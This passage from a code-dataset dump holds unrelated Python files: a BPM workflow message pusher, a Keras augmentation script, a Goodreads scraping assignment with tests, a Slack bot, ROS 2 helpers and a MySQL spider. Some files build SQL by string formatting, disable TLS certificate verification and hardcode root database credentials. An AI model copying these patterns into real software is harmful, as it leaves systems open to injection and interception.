''\n\ndef get_itemComment(config,objectid):\n db = get_db_mysql(config)\n cr = db.cursor()\n sql = \"select itemComment from ot_workitemfinished where objectid='{0}'\".format(objectid)\n cr.execute(sql)\n rs1 = cr.fetchone()\n if rs1 is None or rs1[0]=='':\n sql='''\n SELECT TEXT FROM ot_comment m \n WHERE m.WorkItemId='{0}'\n and m.modifiedtime=(select max(modifiedtime) from ot_comment \n where WorkItemId='{1}') limit 1\n '''.format(objectid,objectid)\n cr.execute(sql)\n rs2 = cr.fetchone()\n cr.close()\n if rs2 is None or rs2[0] == '':\n return ''\n else:\n return rs2[0]\n else:\n cr.close()\n return rs1[0]\n\n\n#处理消息类型:1.延时闭店,2.携物出门,3.营运期施工\ndef send_message_easylife(config,debug):\n db = get_db_mysql(config)\n db2 = get_db_mysql(config)\n cr = db.cursor()\n cr2 = db.cursor()\n\n sql= \"\"\"\n SELECT \n b.workflowCode AS '流程模板编码',\n CONCAT('i_',b.workflowCode) AS '流程模板表',\n b.state AS '实例状态',\n b.bizobjectid AS '流程模板表ID', \n a.participantName AS '参与者姓名',\n a.displayName AS '活动显示名称',\n #a.ActionName AS '操作名称',\n IF(a.ActionName='' AND a.approval!=0,'Submit',a.ActionName) AS '操作名称', \n a.itemComment AS '当前征询意见填写的意见',\n a.finishtime AS '接受时间',\n e.id AS '扩展表主键',\n a.objectid as 'OBJECTID',\n a.InstanceId as 'instanceId'\n FROM ot_workitemfinished a,\n ot_instancecontext b,\n ot_workitemfinished_ext e \n WHERE a.InstanceId=b.objectid \n AND e.task_id= a.objectID \n AND a.FinishTime>'2019-07-15'\n AND b.workflowcode LIKE 'hsh_%'\n AND e.isSend='N' \n order by a.finishtime \n \"\"\"\n\n cr.execute(sql)\n rs = cr.fetchall()\n for i in list(rs):\n n_relationId = get_relationId(config, i[1],i[3])\n v_itemComment = get_itemComment(config, i[10])\n message = {\n 'relationId' : n_relationId,\n 'state' : i[2],\n 'workflowCode' : i[0],\n 'participantName': i[4],\n 'displayName' : i[5],\n 'actionName' : i[6],\n 'itemComment' : v_itemComment, #i[7]\n 'receiveTime' : str(i[8]),\n 'instanceId' : str(i[11])\n }\n\n v_message = json.dumps(message)\n print('v_message=',v_message)\n\n values = {\n 'message': v_message\n }\n\n #调用接口推送消息\n n_failure_time = 
0\n while True:\n try:\n url = config['hopson_interface']\n context = ssl._create_unverified_context()\n data = urllib.parse.urlencode(values).encode(encoding='UTF-8')\n print('data=',data)\n req = urllib.request.Request(url,data=data)\n res = urllib.request.urlopen(req,context=context)\n res = json.loads(res.read())\n print(res,res['code'])\n if res['code'] == 200:\n print('接口调用成功!')\n cr.execute(\"update ot_workitemfinished_ext t set isSend='Y' where id={0}\".format(i[9]))\n db.commit()\n print('扩展表状态更新成功!')\n n_failure_time=0\n break\n else:\n print(res['msg'])\n break\n except:\n print(traceback.format_exc())\n print('接口调用失败,第{0}次重试中...!'.format(str(n_failure_time+1)))\n n_failure_time = n_failure_time + 1\n time.sleep(60)\n time.sleep(5)\n cr.close()\n\n#查询是否有加载待办任务扩展信息\ndef get_undone_task_ext(config):\n db=get_db_mysql(config)\n cr=db.cursor()\n sql='''select count(0)\n FROM ot_workitemfinished t\n WHERE t.receiveTime>='2019-07-03'\n AND t.workflowcode LIKE 'hsh%'\n AND NOT EXISTS(SELECT 1 FROM ot_workitemfinished_ext e\n WHERE e.task_id= t.objectID)\n '''\n cr.execute(sql)\n rs=cr.fetchone()\n cr.close()\n return rs[0]\n\n#加载待办任务至扩展表【合生通】\ndef write_undone_task_ext(config):\n db=get_db_mysql(config)\n cr=db.cursor()\n if get_undone_task_ext(config)==0:\n print('未找到新的待办任务!')\n else:\n sql='''INSERT INTO ot_workitemfinished_ext(inst_id,task_id) \n SELECT t.instanceid, t.objectID\n FROM ot_workitemfinished t\n WHERE t.receiveTime>='2019-07-03'\n AND t.workflowcode LIKE 'hsh%'\n AND NOT EXISTS(SELECT 1 FROM ot_workitemfinished_ext e\n WHERE e.task_id= t.objectID)\n '''\n cr.execute(sql)\n db.commit()\n print('采集到新的待办任务!')\n cr.close()\n\n#消息推送\ndef push(config,debug):\n #循环临听待办任务表变化,变更新扩展表进行消息推送处理\n while True:\n #将未推送消息待办任务写入扩展表\n write_undone_task_ext(config)\n #推送合生通消息\n send_message_easylife(config,debug)\n #休眠\n print('休眠 {0}秒...'.format(config['send_gap']))\n time.sleep(int(config['send_gap']))\n\ndef main():\n #init variable\n config = \"\"\n debug = False\n warnings.filterwarnings(\"ignore\")\n #get parameter from console\n for p in range(len(sys.argv)):\n if sys.argv[p] == \"-conf\":\n config = sys.argv[p + 1]\n elif sys.argv[p] == \"-debug\":\n debug = True\n\n #初始化\n config=init(config)\n\n #process\n push(config,debug)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"h3bpm_sender/h3bpm_easylife_sender_gray/h3bpm_easylife_sender.py","file_name":"h3bpm_easylife_sender.py","file_ext":"py","file_size_in_byte":11721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"286635707","text":"\r\n'''\r\nO código inicial para a parte de data augentation foi retirado deste site:\r\nhttp://sigmoidal.ai/reduzindo-overfitting-com-data-augmentation/\r\ne feitas algumas adaptações\r\n'''\r\n\r\n# importar os pacotes necessários\r\nimport numpy as np\r\nfrom keras.preprocessing.image import load_img\r\nfrom keras.preprocessing.image import img_to_array\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom os import listdir\r\nimport os\r\n\r\npastas = [arq for arq in listdir(\"caracteres/\")]\r\n\r\nfor pasta in pastas:\r\n\r\n\r\n\tarquivos = [arq for arq in listdir(\"caracteres/\"+pasta+\"/\")]\r\n\tos.mkdir(\"aumenta/\"+pasta)\r\n\timagens = [arq for arq in arquivos if arq.lower().endswith(\".jpg\")]\r\n\timagensCriadas=0\r\n\r\n\tnumeroDeImagens=len(imagens)\r\n\r\n\tif numeroDeImagens<30:\r\n\t\treplicas=25\r\n\telif numeroDeImagens<40:\r\n\t\treplicas=17\r\n\telif numeroDeImagens<50:\r\n\t\treplicas=13\r\n\telif 
numeroDeImagens<60:\r\n\t\treplicas=10\r\n\telif numeroDeImagens<80:\r\n\t\treplicas=9\r\n\r\n\telif numeroDeImagens<90:\r\n\t\treplicas=6\r\n\r\n\telif numeroDeImagens<110:\r\n\t\treplicas=5\r\n\r\n\telif numeroDeImagens<150:\r\n\t\treplicas=4\r\n\r\n\telif numeroDeImagens<210:\r\n\t\treplicas=3\r\n\r\n\telif numeroDeImagens<270:\r\n\t\treplicas=2\r\n\r\n\telse:\r\n\t\treplicas=1\r\n\r\n\tfor imagemCaracter in imagens:\r\n\t\t# definir caminhos da imagem original e diretório do output\r\n\t\tIMAGE_PATH = \"caracteres/\"+pasta+\"/\"+imagemCaracter\r\n\t\tOUTPUT_PATH = \"aumenta/\"+pasta+\"/\"\r\n\t\t \r\n\t\t# carregar a imagem original e converter em array\r\n\t\timage = load_img(IMAGE_PATH)\r\n\t\timage = img_to_array(image)\r\n\t\t \r\n\t\t# adicionar uma dimensão extra no array\r\n\t\timage = np.expand_dims(image, axis=0)\r\n\t\t \r\n\t\t# criar um gerador (generator) com as imagens do\r\n\t\t# data augmentation\r\n\t\timgAug = ImageDataGenerator( rotation_range=8,\r\n\t\t\t\t\t\tzoom_range=[0.9,1.0],\r\n\t\t\t\t\t\t\t\t\tbrightness_range=[0.1,3],\r\n\t\t\t\t fill_mode='nearest', horizontal_flip=False)\r\n\t\timgGen = imgAug.flow(image, save_to_dir=OUTPUT_PATH,\r\n\t\t\t\t save_format='jpg', save_prefix='0000001')\r\n\r\n\t\t# gerar 10 imagens por data augmentation\r\n\t\tcounter = 0\r\n\t\tfor (i, newImage) in enumerate(imgGen):\r\n\t\t\tcounter += 1\r\n\t\t\timagensCriadas+=1\r\n\r\n\t\t\t# ao gerar 10 imagens, parar o loop\r\n\t\t\tif counter == replicas:\r\n\t\t\t\tbreak\r\n\r\n\t\tif imagensCriadas>500:\r\n\t\t\tbreak\r\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"597166420","text":"# coding: utf8\n\nfrom com.handler.base_handler import BaseHandler\nfrom com.manager.article_manager import ArticleManager\nfrom com.manager.category_manager import CategoryManager\nimport com.util.constant as constant\n\nclass MainHandler(BaseHandler):\n \n __article_manager = ArticleManager()\n __category_manager = CategoryManager()\n \n def __init__(self, *args, **argkw):\n super(MainHandler, self).__init__(*args, **argkw)\n self.article_manager = self.__article_manager\n self.category_manager = self.__category_manager\n \n def get(self, param=None):\n try:\n page = int(self.get_argument('page', 1))\n except:\n page = 1\n \n start_index = (page - 1) * constant.PAGE_SIZE\n \n # 获取所有目录\n cats = self.category_manager.get_category()\n \n # 取前5篇最新的文章 \n articles = self.article_manager.get_article(start_index=start_index, count=constant.PAGE_SIZE)\n target_index = 'index.html'\n if self.get_platform() != 'PC':\n target_index = 'index_mobile.html' \n self.render(target_index, cats=cats, articles=articles, current_page=page)\n","sub_path":"com/handler/main_handler.py","file_name":"main_handler.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"362695902","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nimport os\nimport csv\nimport unittest\n\n#Worked with: Grace Coleman and Zita Jameson\n\n\ndef get_titles_from_search_results(filename):\n \"\"\"\n Write a function that creates a BeautifulSoup object on \"search_results.htm\". Parse\n through the object and return a list of tuples containing book titles (as printed on the Goodreads website) \n and authors in the format given below. 
Make sure to strip() any newlines from the book titles and author names.\n\n [('Book title 1', 'Author 1'), ('Book title 2', 'Author 2')...]\n \"\"\"\n f=open(filename, 'r')\n fileData= f.read()\n f.close()\n\n soup= BeautifulSoup(fileData, 'lxml')\n bookTitles= soup.find_all('a', class_= 'bookTitle')\n bookInfo= []\n for tag in bookTitles:\n bookInfo.append(tag.text.strip())\n authorsList=[]\n authorTags=soup.find_all('div', class_='authorName__container')\n for item in authorTags:\n authorsList.append(item.text.strip())\n information=[]\n for i in range(len(bookTitles)):\n tup=(bookInfo[i], authorsList[i])\n information.append(tup)\n return information\n\n\ndef get_search_links(): \n \"\"\"\n Write a function that creates a BeautifulSoup object after retrieving content from\n \"https://www.goodreads.com/search?q=fantasy&qid=NwUsLiA2Nc\". Parse through the object and return a list of\n URLs for each of the first ten books in the search using the following format:\n\n ['https://www.goodreads.com/book/show/84136.Fantasy_Lover?from_search=true&from_srp=true&qid=NwUsLiA2Nc&rank=1', ...]\n\n Notice that you should ONLY add URLs that start with \"https://www.goodreads.com/book/show/\" to \n your list, and , and be sure to append the full path to the URL so that the url is in the format \n “https://www.goodreads.com/book/show/kdkd\".\n\n \"\"\"\n\n url_lst= []\n url= 'https://www.goodreads.com/search?q=fantasty&qid=NwUsLiA2Nc'\n r=requests.get(url)\n soup= BeautifulSoup(r.text, 'html.parser')\n anchor= soup.find_all('a', class_= 'bookTitle')\n for x in anchor:\n link= x['href']\n if link.startswith('/book/show/'):\n i='https://www.goodreads.com'+ str(link)\n url_lst.append(i)\n return url_lst[:10]\n \ndef get_book_summary(book_url):\n \"\"\"\n Write a function that creates a BeautifulSoup object that extracts book\n information from a book's webpage, given the URL of the book. Parse through\n the BeautifulSoup object, and capture the book title, book author, and number \n of pages. This function should return a tuple in the following format:\n\n ('Some book title', 'the book's author', number of pages)\n\n HINT: Using BeautifulSoup's find() method may help you here.\n You can easily capture CSS selectors with your browser's inspector window.\n Make sure to strip() any newlines from the book title and number of pages.\n \"\"\"\n r=requests.get(book_url)\n soup= BeautifulSoup(r.text, 'lxml')\n anchor= soup.find('h1', class_='gr-h1 gr-h1--serif')\n\n title= anchor.text.strip()\n anchor2=soup.find('a', class_='authorName')\n\n author= anchor2.text.strip()\n anchor3= soup.find('span', itemprop='numberOfPages')\n page_count= int(anchor3.text.strip(' pages'))\n tup= (title, author, page_count)\n return tup\n\n \n\ndef summarize_best_books(filepath):\n \"\"\"\n Write a function to get a list of categories, book title and URLs from the \"BEST BOOKS OF 2020\"\n page in \"best_books_2020.htm\". 
This function should create a BeautifulSoup object from a \n filepath and return a list of (category, book title, URL) tuples.\n \n For example, if the best book in category \"Fiction\" is \"The Testaments (The Handmaid's Tale, #2)\", with URL\n https://www.goodreads.com/choiceawards/best-fiction-books-2020, then you should append \n (\"Fiction\", \"The Testaments (The Handmaid's Tale, #2)\", \"https://www.goodreads.com/choiceawards/best-fiction-books-2020\") \n to your list of tuples.\n \"\"\"\n clist=[]\n blist=[]\n ulist=[]\n tups=[]\n\n file1= open(filepath, 'r')\n data= file1.read()\n file1.close()\n soup=BeautifulSoup(data, \"html.parser\")\n cats=soup.find_all('h4', class_= 'category__copy')\n for category in cats:\n clist.append(category.text.strip())\n bestb=soup.find_all('img', class_= \"category__winnerImage\")\n for book in bestb:\n title=book['alt']\n blist.append(title)\n urls= soup.find_all('div', class_= 'category clearFix')\n for url in urls:\n ulist.append(url.find('a')['href'])\n for x in range(len(ulist)):\n tup= (clist[x],blist[x], ulist[x])\n tups.append(tup)\n return tups\n\n\ndef write_csv(data, filename):\n \"\"\"\n Write a function that takes in a list of tuples (called data, i.e. the\n one that is returned by get_titles_from_search_results()), writes the data to a \n csv file, and saves it to the passed filename.\n\n The first row of the csv should contain \"Book Title\" and \"Author Name\", and\n respectively as column headers. For each tuple in data, write a new\n row to the csv, placing each element of the tuple in the correct column.\n\n When you are done your CSV file should look like this:\n\n Book title,Author Name\n Book1,Author1\n Book2,Author2\n Book3,Author3\n ......\n\n This function should not return anything.\n \"\"\"\n with open(filename, 'w', newline='', encoding='utf-8') as f:\n f= csv.writer(f, delimiter=',')\n f.writerow(['Book title', \"Author Name\"])\n for line in data:\n f.writerow(line)\n\n\ndef extra_credit(filepath):\n \"\"\"\n EXTRA CREDIT\n\n Please see the instructions document for more information on how to complete this function.\n You do not have to write test cases for this function.\n \"\"\"\n pass\n\nclass TestCases(unittest.TestCase):\n\n # call get_search_links() and save it to a static variable: search_urls\n\n\n def test_get_titles_from_search_results(self):\n # call get_titles_from_search_results() on search_results.htm and save to a local variable\n search_urls=get_titles_from_search_results('search_results.htm')\n # check that the number of titles extracted is correct (20 titles)\n self.assertEqual(len(search_urls), 20)\n # check that the variable you saved after calling the function is a list\n self.assertIsInstance(search_urls, list)\n # check that each item in the list is a tuple\n for x in search_urls:\n self.assertIsInstance(x, tuple)\n # check that the first book and author tuple is correct (open search_results.htm and find it)\n self.assertEqual(search_urls[0], (\"Harry Potter and the Deathly Hallows (Harry Potter, #7)\", 'J.K. 
Rowling'))\n # check that the last title is correct (open search_results.htm and find it)\n self.assertEqual(search_urls[-1][0], 'Harry Potter: The Prequel (Harry Potter, #0.5)')\n \n def test_get_search_links(self):\n # check that TestCases.search_urls is a list\n search_urls=get_search_links()\n # check that the length of TestCases.search_urls is correct (10 URLs)\n self.assertEqual(len(search_urls), 10)\n\n # check that each URL in the TestCases.search_urls is a string\n for x in search_urls:\n self.assertIsInstance(x, str)\n # check that each URL contains the correct url for Goodreads.com followed by /book/show/\n for x in search_urls:\n self.assertTrue(\"/book/show/\" in x)\n\n def test_get_book_summary(self):\n # create a local variable – summaries – a list containing the results from get_book_summary()\n # for each URL in TestCases.search_urls (should be a list of tuples)\n search_urls= get_search_links()\n summaries=[]\n for url in search_urls:\n summaries.append(get_book_summary(url))\n\n \n\n\n # check that the number of book summaries is correct (10)\n self.assertEqual(len(summaries), 10)\n # check that each item in the list is a tuple\n for x in summaries:\n self.assertEqual(type(x), tuple)\n self.assertEqual(len(x), 3)\n \n # check that each tuple has 3 elements\n\n # check that the first two elements in the tuple are string\n self.assertIsInstance(summaries[0][0], str)\n self.assertIsInstance(summaries[0][1], str) \n # check that the third element in the tuple, i.e. pages is an int\n self.assertIsInstance(summaries[0][2], int)\n # check that the first book in the search has 337 pages\n self.assertEqual(summaries[0][2], 337)\n\n def test_summarize_best_books(self):\n # call summarize_best_books and save it to a variable\n summarize=summarize_best_books('best_books_2020.htm')\n # check that we have the right number of best books (20)\n self.assertEqual(len(summarize), 20)\n # assert each item in the list of best books is a tuple\n for x in summarize:\n self.assertEqual(type(x), tuple)\n self.assertEqual(len(x), 3)\n # check that each tuple has a length of 3\n\n # check that the first tuple is made up of the following 3 strings:'Fiction', \"The Midnight Library\", 'https://www.goodreads.com/choiceawards/best-fiction-books-2020'\n self.assertEqual(summarize[0], ('Fiction', \"The Midnight Library\", 'https://www.goodreads.com/choiceawards/best-fiction-books-2020'))\n # check that the last tuple is made up of the following 3 strings: 'Picture Books', 'Antiracist Baby', 'https://www.goodreads.com/choiceawards/best-picture-books-2020'\n self.assertEqual(summarize[-1],('Picture Books', 'Antiracist Baby', 'https://www.goodreads.com/choiceawards/best-picture-books-2020'))\n\n def test_write_csv(self):\n # call get_titles_from_search_results on search_results.htm and save the result to a variable\n titles=get_titles_from_search_results('search_results.htm')\n # call write csv on the variable you saved and 'test.csv'\n write_csv(titles, 'test.csv')\n # read in the csv that you wrote (create a variable csv_lines - a list containing all the lines in the csv you just wrote to above)\n\n csv_lines=[]\n with open('test.csv') as file:\n csv_f= csv.reader(file)\n for x in csv_f:\n csv_lines.append(x)\n # check that there are 21 lines in the csv\n self.assertEqual(len(csv_lines), 21)\n # check that the header row is correct\n self.assertEqual(csv_lines[0], [\"Book title\", \"Author Name\"])\n # check that the next row is 'Harry Potter and the Deathly Hallows (Harry Potter, #7)', 'J.K. 
Rowling'\n self.assertEqual(csv_lines[1], ['Harry Potter and the Deathly Hallows (Harry Potter, #7)', 'J.K. Rowling'])\n # check that the last row is 'Harry Potter: The Prequel (Harry Potter, #0.5)', 'Julian Harrison (Introduction)'\n self.assertEqual(csv_lines[-1], ['Harry Potter: The Prequel (Harry Potter, #0.5)', 'Julian Harrison (Introduction)'])\n\nif __name__ == '__main__':\n print(extra_credit(\"extra_credit.htm\"))\n unittest.main(verbosity=2)","sub_path":"Project2.py","file_name":"Project2.py","file_ext":"py","file_size_in_byte":11203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"1117896","text":"from django.contrib import admin\n\nfrom home.models import Setting, ContactFormMessage, UserProfile, FAQ\n\n\nclass ContactFormMessageAdmin(admin.ModelAdmin):\n list_display = ['name','email','subject','status']\n list_filter = ['status']\nclass UserProfileAdmin(admin.ModelAdmin):\n list_display = ['user','phone','university','image_tag']\n list_filter = ['university']\nclass FaqAdmin(admin.ModelAdmin):\n list_display = ['ordernumber', 'question', 'answer', 'status']\n list_filter = ['status']\nadmin.site.register(Setting)\nadmin.site.register(ContactFormMessage,ContactFormMessageAdmin)\nadmin.site.register(UserProfile,UserProfileAdmin)\nadmin.site.register(FAQ,FaqAdmin)","sub_path":"home/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"268687772","text":"import re\r\nimport time\r\nfrom slackclient import SlackClient\r\n\r\n\r\n# instantiate Slack client\r\nslack_client = SlackClient('your bot token goes here')\r\n\r\n# constants\r\nRTM_READ_DELAY = 1 # 1 second delay between reading from RTM\r\nEXAMPLE_COMMAND = \"Question:\"\r\nEXAMPLE_COMMAND2 = \"yes\"\r\nEXAMPLE_COMMAND3 = \"no\"\r\nEXAMPLE_COMMAND4 = \"answer:\"\r\nMENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\r\n\r\n\r\n\r\n\r\ndef parse_bot_commands(slack_events):\r\n \"\"\"\r\n Parses a list of events coming from the Slack RTM API to find bot commands.\r\n If a bot command is found, this function returns a tuple of command and channel.\r\n If its not found, then this function returns None, None.\r\n \"\"\"\r\n for event in slack_events:\r\n if event[\"type\"] == \"message\" and not \"subtype\" in event:\r\n user_id, message = parse_direct_mention(event[\"text\"])\r\n if user_id == starterbot_id:\r\n return message, event[\"channel\"]\r\n return None, None\r\n\r\ndef parse_direct_mention(message_text):\r\n \"\"\"\r\n Finds a direct mention (a mention that is at the beginning) in message text\r\n and returns the user ID which was mentioned. If there is no direct mention, returns None\r\n \"\"\"\r\n matches = re.search(MENTION_REGEX, message_text)\r\n # the first group contains the username, the second group contains the remaining message\r\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)\r\n\r\ndef define_question(command):\r\n global question \r\n question = command\r\n\r\ndef handle_command(command, channel):\r\n \r\n \"\"\"\r\n Executes bot command if the command is known\r\n \"\"\"\r\n if channel == \"Questions channel id\":\r\n answer = \"Not sure what you mean. 
Try *{}*\".format(EXAMPLE_COMMAND)\r\n        if command.startswith(EXAMPLE_COMMAND):\r\n            answer = \"Sending your question to specialists!\"\r\n            define_question(command)\r\n            slack_client.api_call(\r\n                \"chat.postMessage\",\r\n                channel=\"#canal0\",\r\n                text=\"New {} do you know how to answer it? (Say yes or no)\".format(command)\r\n            )\r\n        if command.startswith(EXAMPLE_COMMAND2):\r\n            answer = \"Thanks for the feedback :heart:\"\r\n        if command.startswith(EXAMPLE_COMMAND3):\r\n            answer = \"Sorry for that, feel free to send me another question!\"\r\n    if channel == \"channel0 id\":\r\n        answer = \"Not sure what you mean. Try *{}* or *{}*.\".format(EXAMPLE_COMMAND2,EXAMPLE_COMMAND3)\r\n        if command.startswith(EXAMPLE_COMMAND2):\r\n            answer = \"Waiting for your answer (use {} to respond), Thank you!\".format(EXAMPLE_COMMAND4)\r\n        if command.startswith(EXAMPLE_COMMAND3):\r\n            answer = \"Sending question to next channel...\"\r\n            slack_client.api_call(\r\n                \"chat.postMessage\",\r\n                channel=\"#canal1\",\r\n                text=\"New {} do you know how to answer it? (Say yes or no)\".format(question)\r\n            )\r\n            #send to next channel\r\n        if command.startswith(EXAMPLE_COMMAND4):\r\n            answer = \"Sending your answer to the requester, Thank you! :heart: \"\r\n            slack_client.api_call(\r\n                \"chat.postMessage\",\r\n                channel=\"#python-bot\",\r\n                text=\"{} is this answer satisfactory? (say *yes* or *no*)\".format(command)\r\n            )\r\n    if channel == \"channel1 id\":\r\n        answer = \"Not sure what you mean. Try *{}* or *{}*.\".format(EXAMPLE_COMMAND2,EXAMPLE_COMMAND3)\r\n        if command.startswith(EXAMPLE_COMMAND2):\r\n            answer = \"Waiting for your answer (use {} to respond), Thank you!\".format(EXAMPLE_COMMAND4)\r\n        if command.startswith(EXAMPLE_COMMAND3):\r\n            answer = \"Sending question to next channel...\"\r\n            slack_client.api_call(\r\n                \"chat.postMessage\",\r\n                channel=\"#canal2\",\r\n                text=\"New {} do you know how to answer it? (Say yes or no)\".format(question)\r\n            )\r\n        if command.startswith(EXAMPLE_COMMAND4):\r\n            answer = \"Sending your answer to the requester, Thank you! :heart: \"\r\n            slack_client.api_call(\r\n                \"chat.postMessage\",\r\n                channel=\"#python-bot\",\r\n                text=\"{} is this answer satisfactory? (say *yes* or *no*)\".format(command)\r\n            )\r\n    \r\n\r\n    # Sends the answer back to the channel\r\n    slack_client.api_call(\r\n        \"chat.postMessage\",\r\n        channel=channel,\r\n        text=answer\r\n    )\r\n\r\nif __name__ == \"__main__\":\r\n    if slack_client.rtm_connect(with_team_state=False):\r\n        print(\"Starter Bot connected and running!\")\r\n\r\n        # Read bot's user ID by calling Web API method `auth.test`\r\n        starterbot_id = slack_client.api_call(\"auth.test\")[\"user_id\"]\r\n        while True:\r\n            command, channel = parse_bot_commands(slack_client.rtm_read())\r\n            if command:\r\n                handle_command(command, channel)\r\n            time.sleep(RTM_READ_DELAY)\r\n    else:\r\n        print(\"Connection failed. 
Exception traceback printed above.\")","sub_path":"code/slackbot-en.py","file_name":"slackbot-en.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"75470745","text":"# Copyright 2019 Open Source Robotics Foundation, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\n\nfrom ament_index_python import get_resource\nfrom ament_index_python import get_resources\nfrom ament_index_python import has_resource\n\nfrom rosidl_runtime_py import utilities\nfrom rosidl_runtime_py.convert import message_to_yaml\n\n\ndef get_all_interface_packages():\n return get_resources('rosidl_interfaces')\n\n\ndef get_interfaces(package_name):\n if not has_resource('packages', package_name):\n raise LookupError('Unknown package {}'.format(package_name))\n try:\n content, _ = get_resource('rosidl_interfaces', package_name)\n except LookupError:\n return []\n interface_names = content.splitlines()\n return list(sorted({\n n.rsplit('.', 1)[0]\n for n in interface_names\n if '_' not in n}))\n\n\ndef get_interface_path(parts):\n prefix_path = has_resource('packages', parts[0])\n joined = '/'.join(parts)\n if len(parts[-1].rsplit('.', 1)) == 1:\n joined += '.idl'\n interface_path = os.path.join(\n prefix_path, 'share', joined)\n if not os.path.exists(interface_path):\n raise LookupError('Could not find the interface {!r}'.format(interface_path))\n return interface_path\n\n\ndef package_name_completer(**kwargs):\n \"\"\"Callable returning a list of types containing messages, services, and action.\"\"\"\n return get_all_interface_packages()\n\n\ndef type_completer(**kwargs):\n \"\"\"Callable returning a list of message, service, and action types.\"\"\"\n types = []\n for package_name, service_names in get_all_service_types().items():\n for service_name in service_names:\n types.append(\n '{package_name}/srv/{service_name}'.format_map(locals()))\n\n for package_name, message_names in get_all_message_types().items():\n for message_name in message_names:\n types.append(\n '{package_name}/msg/{message_name}'.format_map(locals()))\n\n for package_name, action_names in get_all_action_types().items():\n for action_name in action_names:\n types.append(\n '{package_name}/action/{action_name}'.format_map(locals()))\n\n return sorted(types)\n\n\ndef get_all_action_types():\n all_action_types = {}\n for package_name in get_resources('rosidl_interfaces'):\n action_types = get_action_types(package_name)\n if action_types:\n all_action_types[package_name] = action_types\n return all_action_types\n\n\ndef get_action_types(package_name):\n if not has_resource('packages', package_name):\n raise LookupError('Unknown package name')\n try:\n content, _ = get_resource('rosidl_interfaces', package_name)\n except LookupError:\n return []\n interface_names = content.splitlines()\n # TODO(jacobperron) this logic should come from a rosidl related package\n # Only return actions in action folder\n return list(sorted({\n n[7:].rsplit('.', 
1)[0]\n for n in interface_names\n if n.startswith('action/') and (n[-4:] == '.idl' or n[-7:] == '.action')}))\n\n\ndef get_all_message_types():\n all_message_types = {}\n for package_name in get_resources('rosidl_interfaces'):\n message_types = get_message_types(package_name)\n if message_types:\n all_message_types[package_name] = message_types\n return all_message_types\n\n\ndef get_message_types(package_name):\n if not has_resource('packages', package_name):\n raise LookupError('Unknown package name')\n try:\n content, _ = get_resource('rosidl_interfaces', package_name)\n except LookupError:\n return []\n interface_names = content.splitlines()\n # TODO(dirk-thomas) this logic should come from a rosidl related package\n # Only return messages in msg folder\n return list(sorted({\n n[4:-4]\n for n in interface_names\n if n.startswith('msg/') and n[-4:] in ('.idl', '.msg')}))\n\n\ndef get_all_service_types():\n all_service_types = {}\n for package_name in get_resources('rosidl_interfaces'):\n service_types = get_service_types(package_name)\n if service_types:\n all_service_types[package_name] = service_types\n return all_service_types\n\n\ndef get_service_types(package_name):\n if not has_resource('packages', package_name):\n raise LookupError('Unknown package name')\n try:\n content, _ = get_resource('rosidl_interfaces', package_name)\n except LookupError:\n return []\n interface_names = content.splitlines()\n # TODO(dirk-thomas) this logic should come from a rosidl related package\n # Only return services in srv folder\n return list(sorted({\n n[4:-4]\n for n in interface_names\n if n.startswith('srv/') and n[-4:] in ('.idl', '.srv')}))\n\n\ndef get_message_path(package_name, message_name):\n message_types = get_message_types(package_name)\n if message_name not in message_types:\n raise LookupError('Unknown message name')\n prefix_path = has_resource('packages', package_name)\n # TODO(dirk-thomas) this logic should come from a rosidl related package\n return os.path.join(\n prefix_path, 'share', package_name, 'msg', message_name + '.msg')\n\n\ndef interface_to_yaml(identifier):\n interface = utilities.get_interface(identifier)\n if utilities.is_action(interface):\n instance = interface.Goal()\n elif utilities.is_service(interface):\n instance = interface.Request()\n else:\n instance = interface()\n\n return message_to_yaml(instance)\n","sub_path":"ros2interface/ros2interface/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294764493","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pymysql\n\nclass bookSpider(object):\n def __init__(self,url):\n self.url=url;\n self.headers={\n 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\n 'Referer': 'http://i.meizitu.net'\n }\n def getHtml(self):\n res=requests.get(self.url,self.headers)\n soup=BeautifulSoup(res.text,\"lxml\")\n tt=soup.select('body > div:nth-child(5) > div.firs.d.l.topk > div.topli > ul > li>a')\n for url in tt:\n dmurl=\"http://www.fengchedm.com\"+url.get('href')\n title=url.get('title')\n print(dmurl,title)\n self.saveDb(dmurl,title)\n\n def saveDb(self, dmurl,title):\n db = pymysql.connect('localhost', 'root', '123456', 'pyData')\n cursor = db.cursor()\n sql = \"insert into dmlist(dmurl,title)\" \\\n \"values ('%s','%s')\" % (dmurl,title)\n try:\n cursor.execute(sql)\n db.commit()\n except:\n db.rollback()\n cursor.close()\n\ndef createDb():\n db = 
